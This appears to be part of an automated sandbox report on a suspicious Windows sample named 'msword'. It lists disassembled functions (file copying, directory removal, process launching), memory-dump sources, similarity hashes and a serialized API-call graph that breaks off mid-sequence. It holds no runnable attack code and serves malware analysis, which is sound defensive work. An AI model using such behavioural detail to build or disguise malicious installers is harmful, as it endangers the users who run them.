• Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_msword.jbxd
Similarity
• API ID: Window$CallMessageProcSendVisible
• String ID: $@rD
• API String ID: 3748168415-881980237
• Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
• Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
• Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
• Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
APIs
  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
  • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
  • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
• lstrlenW.KERNEL32 ref: 004026B4
• lstrlenW.KERNEL32(00000000), ref: 004026C1
• SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
Strings
Memory Dump Source
• Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_msword.jbxd
Similarity
• API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
• String ID: CopyFiles "%s"->"%s"
• API String ID: 2577523808-3778932970
• Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
• Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
• Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
• Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_msword.jbxd
Similarity
• API ID: lstrcatwsprintf
• String ID: %02x%c$...
• API String ID: 3065427908-1057055748
• Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
• Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
• Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
• Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
APIs
• OleInitialize.OLE32(00000000), ref: 00405057
  • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
• OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
Strings
Memory Dump Source
• Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_msword.jbxd
Similarity
• API ID: InitializeMessageSendUninitializelstrlenwvsprintf
• String ID: Section: "%s"$Skipping section: "%s"
• API String ID: 2266616436-4211696005
• Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
• Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
• Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
• Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
APIs
• GetDC.USER32(?), ref: 00402100
• GetDeviceCaps.GDI32(00000000), ref: 00402107
• MulDiv.KERNEL32(00000000,00000000), ref: 00402117
  • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
• CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
  • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
Memory Dump Source
• Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_msword.jbxd
Similarity
• API ID: CapsCreateDeviceFontIndirectVersionwsprintf
• String ID:
• API String ID: 1599320355-0
• Opcode ID: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
• Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
• Opcode Fuzzy Hash: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
• Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
APIs
  • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
• lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
• lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
• lstrcpynW.KERNEL32(?,?,?), ref: 00407261
Strings
Memory Dump Source
• Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_msword.jbxd
Similarity
• API ID: lstrcpyn$CreateFilelstrcmp
• String ID: Version
• API String ID: 512980652-315105994
• Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
• Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
• Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
• Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
APIs
• DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
• GetTickCount.KERNEL32 ref: 00403303
• CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
• ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
Memory Dump Source
• Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_msword.jbxd
Similarity
• API ID: Window$CountCreateDestroyDialogParamShowTick
• String ID:
• API String ID: 2102729457-0
• Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
• Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
• Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
• Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                                                                        APIs
                                                                                        • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                        • String ID:
                                                                                        • API String ID: 2883127279-0
                                                                                        • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                                        • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                                                                        • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                                        • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                                                                        APIs
                                                                                        • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                        • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: PrivateProfileStringlstrcmp
                                                                                        • String ID: !N~
                                                                                        • API String ID: 623250636-529124213
                                                                                        • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                                        • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                                                                        • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                                        • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                                                                        APIs
                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                        • CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                        Strings
                                                                                        • Error launching installer, xrefs: 00405C48
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateHandleProcess
                                                                                        • String ID: Error launching installer
                                                                                        • API String ID: 3712363035-66219284
                                                                                        • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                                        • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                                                                        • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                                        • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                                                                        APIs
                                                                                        • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                        • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                          • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandlelstrlenwvsprintf
                                                                                        • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                        • API String ID: 3509786178-2769509956
                                                                                        • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                                        • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                                                                        • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                                        • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                                        • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                                                        • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                                                        • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                                        • String ID:
                                                                                        • API String ID: 190613189-0
                                                                                        • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                                        • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                                                                        • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                                        • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                                                                                        Execution Graph

                                                                                        Execution Coverage:2.9%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:3.6%
                                                                                        Total number of Nodes:2000
                                                                                        Total number of Limit Nodes:69
                                                                                        execution_graph: [serialized node and edge data of the interactive execution graph (node ids, call edges, resolved API names); rendered as a graph in the original report]
96635->96575 96636->96581 96637->96585 96638->96588 96639->96592 96641 270d26 GetCurrentProcess GetCurrentProcess DuplicateHandle 96640->96641 96642 270b03 InterlockedExchange 96640->96642 96641->96642 96642->96520 96644 2712e0 96643->96644 96645 2712db 96643->96645 96647 271196 InterlockedExchange 96645->96647 96648 2711c1 96647->96648 96649 2711c7 96647->96649 96650 22017b 22 API calls 96648->96650 96651 22017b 22 API calls 96649->96651 96650->96649 96652 2711d9 ReadFile 96651->96652 96653 2712a8 96652->96653 96654 2711fc 96652->96654 96656 2712c1 InterlockedExchange 96653->96656 96654->96653 96655 271206 EnterCriticalSection 96654->96655 96657 27122e __fread_nolock 96654->96657 96655->96654 96655->96657 96656->96644 96658 271279 LeaveCriticalSection ReadFile 96657->96658 96659 22017b 22 API calls 96657->96659 96658->96653 96658->96654 96659->96657 96660 242782 96663 202ab0 96660->96663 96664 243a1a DestroyWindow 96663->96664 96665 202aef mciSendStringW 96663->96665 96676 243a26 96664->96676 96666 202d66 96665->96666 96667 202b0b 96665->96667 96666->96667 96669 202d75 UnregisterHotKey 96666->96669 96668 202b19 96667->96668 96667->96676 96699 202ede 96668->96699 96669->96666 96671 243a6b 96677 243a8f 96671->96677 96678 243a7e FreeLibrary 96671->96678 96672 243a44 FindClose 96672->96676 96675 202b2e 96675->96677 96685 202b3c 96675->96685 96676->96671 96676->96672 96710 207aab 96676->96710 96679 243aa3 VirtualFree 96677->96679 96680 243ad1 96677->96680 96678->96671 96679->96677 96682 202ba9 96680->96682 96703 270b4c 96680->96703 96681 202b98 CoUninitialize 96681->96680 96681->96682 96683 202bb4 96682->96683 96684 243aeb 96682->96684 96687 202bc4 96683->96687 96691 243afa ISource 96684->96691 96714 273d30 6 API calls ISource 96684->96714 96685->96681 96708 202ff4 24 API calls 96687->96708 96689 202bda 96709 202e1c 22 API calls 96689->96709 96694 243b89 96691->96694 96715 266e3b 22 API calls ISource 96691->96715 96694->96694 96701 202eeb 96699->96701 96700 202b20 
